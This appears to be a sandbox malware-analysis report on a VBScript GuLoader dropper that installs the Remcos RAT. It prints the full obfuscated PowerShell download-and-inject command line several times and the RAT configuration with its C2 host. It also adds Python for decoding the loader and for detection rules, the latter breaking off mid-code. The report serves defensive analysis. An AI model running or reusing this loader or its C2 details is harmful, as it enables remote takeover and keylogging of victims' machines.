
Windows Analysis Report
nOrden_de_Compra___0001245.vbs

Overview

General Information

Sample name: nOrden_de_Compra___0001245.vbs
Analysis ID: 1545815
MD5: 44f5fc0dbe40738a8d1da8a520c37ade
SHA1: 1ae7e777e876136b30aec574f10215ef672ff451
SHA256: 4c9a883ec5718156811bee47cca44c3115f1dcb04ecc6541192e807ec1952e85
Tags: vbs, user-Porcupine

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 6416 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WMIC.exe (PID: 5264 cmdline: wmic diskdrive get caption,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. 
Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germiniparous (Levelheadedness 'Fr$ .g MlS O uB,aA l : NTaoslr m uaVoL ,tReiBrLmas STSua Rn od EAlnovsS =G ( .tOvEG.S oTWr- PPrua ftT H U po$,eG LA mTiID.NNegMaSBi) U ') ;Germiniparous (Levelheadedness 'Fo$SnG LunoChBAsA QlI : oPSka,rs OTO.e.tl BfBoA R evMyeWaRP nS.eNes.t=U $ Ig Hl Uo.nbPeaWiLAl:Mep ArskoAfPEsh TytrL vAF cIntLoOFodLooyaNA TKoi.iaVe+Ev+ A%Su$AfFDiOS LPiIAroK ljgO ssF ERa1Fl9 T7Li.CacAmoc.uBln LTF, ') ;$Booklores=$Foliolose197[$Pastelfarvernes];}$Kontorassistentens153=302470;$Fejldisponeres=27572;Germiniparous (Levelheadedness 'De$ GSal TOSpB VaMalF :NoSMat DOLaKCoEAgs .I a S y=Mi GagR.EB T S-Dic noH nAuT wE ONTet . 
Un$ThgJeA SmShI HNS g LsFr ');Germiniparous (Levelheadedness '.e$Kmg .l to,ebDiaJalCa:N SSaeVrnMygS eH,n ,eDe B =ka Cl[ yS LyUdsNot.oe ,m .a CWeo PnRavUneKrrBltMa]Ex: U:ViFP r MoFom BKoaUvs ueAs6Ty4 ,SCatinrViiV.nR gFe(Al$ DsRet eo kAme asAriBla a)Be ');Germiniparous (Levelheadedness 'S $ BgRelGiO bDiaAnlAv:U.S TPA kPlK,eE SD.oe P Ma=Sl U[ SSnyUnsReTKoeSkmGl.MatPreN xb TPo. yEAunFeCGiOH,D siFln RGZa] .:O :UnAKaSRecpoiKoIEr.TaGPue .t bSintH rUnIQuN ogSt( $ SReEBrNDigO ePrnUnECe)H ');Germiniparous (Levelheadedness ' B$ aGStLUnO oBHeaMaLRe: AMChuFolReT Fi,ob.ei mrnot .HSu= T$NosRepOnk uK MeSvdDeeQu. AsS Um,bTusSaT TrTeINaNTrG (Re$.okS oH NA tE oGir HanoSDrsCai nS AT SE rNO tJaeFonP SUn1Ek5,a3 ,,Su$SuFAmE jWalS dL,IMasSapTroSmnMaeNoRPiE lSPo)Di ');Germiniparous $Multibirth;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7108 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. 
Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germiniparous (Levelheadedness 'Fr$ .g MlS O uB,aA l : NTaoslr m uaVoL ,tReiBrLmas STSua Rn od EAlnovsS =G ( .tOvEG.S oTWr- PPrua ftT H U po$,eG LA mTiID.NNegMaSBi) U ') ;Germiniparous (Levelheadedness 'Fo$SnG LunoChBAsA QlI : oPSka,rs OTO.e.tl BfBoA R evMyeWaRP nS.eNes.t=U $ Ig Hl Uo.nbPeaWiLAl:Mep ArskoAfPEsh TytrL vAF cIntLoOFodLooyaNA TKoi.iaVe+Ev+ A%Su$AfFDiOS LPiIAroK ljgO ssF ERa1Fl9 T7Li.CacAmoc.uBln LTF, ') ;$Booklores=$Foliolose197[$Pastelfarvernes];}$Kontorassistentens153=302470;$Fejldisponeres=27572;Germiniparous (Levelheadedness 'De$ GSal TOSpB VaMalF :NoSMat DOLaKCoEAgs .I a S y=Mi GagR.EB T S-Dic noH nAuT wE ONTet . 
Un$ThgJeA SmShI HNS g LsFr ');Germiniparous (Levelheadedness '.e$Kmg .l to,ebDiaJalCa:N SSaeVrnMygS eH,n ,eDe B =ka Cl[ yS LyUdsNot.oe ,m .a CWeo PnRavUneKrrBltMa]Ex: U:ViFP r MoFom BKoaUvs ueAs6Ty4 ,SCatinrViiV.nR gFe(Al$ DsRet eo kAme asAriBla a)Be ');Germiniparous (Levelheadedness 'S $ BgRelGiO bDiaAnlAv:U.S TPA kPlK,eE SD.oe P Ma=Sl U[ SSnyUnsReTKoeSkmGl.MatPreN xb TPo. yEAunFeCGiOH,D siFln RGZa] .:O :UnAKaSRecpoiKoIEr.TaGPue .t bSintH rUnIQuN ogSt( $ SReEBrNDigO ePrnUnECe)H ');Germiniparous (Levelheadedness ' B$ aGStLUnO oBHeaMaLRe: AMChuFolReT Fi,ob.ei mrnot .HSu= T$NosRepOnk uK MeSvdDeeQu. AsS Um,bTusSaT TrTeINaNTrG (Re$.okS oH NA tE oGir HanoSDrsCai nS AT SE rNO tJaeFonP SUn1Ek5,a3 ,,Su$SuFAmE jWalS dL,IMasSapTroSmnMaeNoRPiE lSPo)Di ');Germiniparous $Multibirth;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 2608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 6764 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
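The PowerShell stage in the process tree above is decoded at run time by the function named Levelheadedness: each call receives a filler-padded string and returns the characters at index 2, 5, 8, ... (the loop `for ($i=2; $i -lt $bound; $i+=3)`), and the result is handed to Germiniparous, which evaluates it through a dynamically resolved command (`& ($Artistiske) ($Brions)`; the decoded command name is not shown on this page). Two details matter for analysis. $Pedlars is never assigned, so it contributes 0 to the loop bound, and $Videoapparatets86 is incremented on every call while $host.DebuggerEnabled is true; that counter is script-global, so stepping through the script under a debugger shortens each successive decode and silently truncates later strings instead of failing loudly. The following is an added Python re-implementation, not code from the report or from the sample, that decodes fragments statically. The $Booklores fragment copied from the command line decodes to the URL of the first download seen in the HTTP traffic; most other fragments on this page do not decode cleanly because runs of spaces were collapsed when the report was rendered (the first $Plenches fragment should yield the 'Mozilla/' prefix of the observed User-Agent but does not), so decode from the original script rather than from this page. The encoder is an assumption used only to build test input.

```python
import random
import re
import string

# Argument of `$Booklores=Levelheadedness '...'`, copied from the command line
# above.  Unlike most fragments on this page it contains no repeated spaces,
# so it survived rendering intact.
BOOKLORES = ("S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa"
             " A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ")


class Decoder:
    """Python mirror of the Levelheadedness function.

    $kreturene = $Pedlars + $s.Length - $Videoapparatets86: $Pedlars is never
    assigned (so $null, i.e. 0) and $Videoapparatets86 is a script-level
    counter that grows by one on each call while $host.DebuggerEnabled is
    true.  The loop then collects s[2], s[5], s[8], ... below that bound.
    """

    def __init__(self, debugger_enabled: bool = False) -> None:
        self.debugger_enabled = debugger_enabled
        self.calls_under_debugger = 0          # $Videoapparatets86

    def decode(self, s: str) -> str:
        if self.debugger_enabled:
            self.calls_under_debugger += 1
        limit = len(s) - self.calls_under_debugger   # $kreturene
        return "".join(s[i] for i in range(2, limit, 3))


def encode_every_third(plain: str, rng: random.Random) -> str:
    """Assumed inverse (the loader's builder is not on the page): two filler
    characters in front of every real character, no trailing pad."""
    filler = string.ascii_letters + " ,."
    return "".join(rng.choice(filler) + rng.choice(filler) + ch for ch in plain)


def sample_encoded(plain: str, seed: int = 7) -> str:
    """Deterministic test material built with the assumed encoder."""
    return encode_every_third(plain, random.Random(seed))


# `Levelheadedness '<padded string>'` as it appears throughout the script.
DECODER_CALL = re.compile(r"Levelheadedness\s+'([^']*)'")


def deobfuscate_script(script: str, decoder: Decoder = None) -> str:
    """Statically replace every decoder call with its plaintext literal."""
    decoder = decoder or Decoder()
    return DECODER_CALL.sub(lambda m: "'" + decoder.decode(m.group(1)) + "'", script)


if __name__ == "__main__":
    print(Decoder().decode(BOOKLORES))
    snippet = "$Olga=Levelheadedness '" + sample_encoded("User-Agent") + "';"
    print(deobfuscate_script(snippet))
    # Under a debugger the third call already loses its last character.
    dbg = Decoder(debugger_enabled=True)
    print(dbg.decode(BOOKLORES), dbg.decode(BOOKLORES), dbg.decode(BOOKLORES), sep="\n")
```

Static substitution is enough for this stage because every fragment is a literal; the assignments that build `$Plenches` from two fragments and the `while (!$Normaltilstandens)` download loop then read as plain PowerShell. Whether a string loses characters under the debugger depends on its length modulo 3, which is why some decodes look fine for a few calls before the corruption shows.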
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration (Remcos):
{"Host:Port:Password": ["fumecexpsales1international.duckdns.org:50396:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-T15VJD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Source | Rule | Description | Author | Strings
00000009.00000002.3333353972.000000002316F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000006.00000002.2420231333.0000000008AA0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000006.00000002.2420398899.000000000BB20000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
(7 further entries are collapsed in the original report and not shown here)

Source | Rule | Description | Author | Strings
amsi64_576.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_7108.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0xbd12:$b2: ::FromBase64String(
  • 0xadb8:$s1: -join
  • 0x4564:$s4: +=
  • 0x4626:$s4: +=
  • 0x884d:$s4: +=
  • 0xa96a:$s4: +=
  • 0xac54:$s4: +=
  • 0xad9a:$s4: +=
  • 0x1426e:$s4: +=
  • 0x142ee:$s4: +=
  • 0x143b4:$s4: +=
  • 0x14434:$s4: +=
  • 0x1460a:$s4: +=
  • 0x1468e:$s4: +=
  • 0xb5c0:$e4: Get-WmiObject
  • 0xb7af:$e4: Get-Process
  • 0xb807:$e4: Start-Process
  • 0x14f4a:$e4: Get-Process

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs", ProcessId: 6416, ProcessName: wscript.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 200.6.118.162, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6764, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49401
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs", ProcessId: 6416, ProcessName: wscript.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. 
Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germiniparous (Levelheadedness 'Fr$ .g MlS O uB,aA l : NTaoslr m uaVoL ,tReiBrLmas STSua
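The execution chain in the process tree, wscript.exe spawning WMIC with a Win32_DiskDrive query and then powershell.exe with a multi-kilobyte obfuscated command line, followed by a 32-bit PowerShell that creates msiexec.exe and injects into it, and msiexec.exe then initiating the outbound connection, is what the Sigma matches listed in this section and the behaviour signatures at the top of the report key on. The following added Python example (not from the report and not a Sigma rule) expresses those checks as rules over Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) events. The events are constructed from the process tree in this report; the WMIC image path, the filler that pads the PowerShell command line, the length threshold and the benign control event are assumptions.

```python
import re
from ipaddress import ip_address

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
LONG_CMDLINE = 1000                                   # threshold: assumption
DYNAMIC_INVOKE = re.compile(r"&\s*\(\s*\$\w+\s*\)")   # `& ($Artistiske) ...`

# Real prefix of the PowerShell command line from the process tree, padded
# with constructed filler to a length comparable to the original.
PS_PREFIX = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" " '
    "<#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';"
    "function Germiniparous($Brions){ & ($Artistiske) ($Brions);}"
)
PS_CMDLINE = PS_PREFIX + "<#padding#>" * 400 + '"'

# Sysmon-style events constructed from the process tree above.  PIDs, parent
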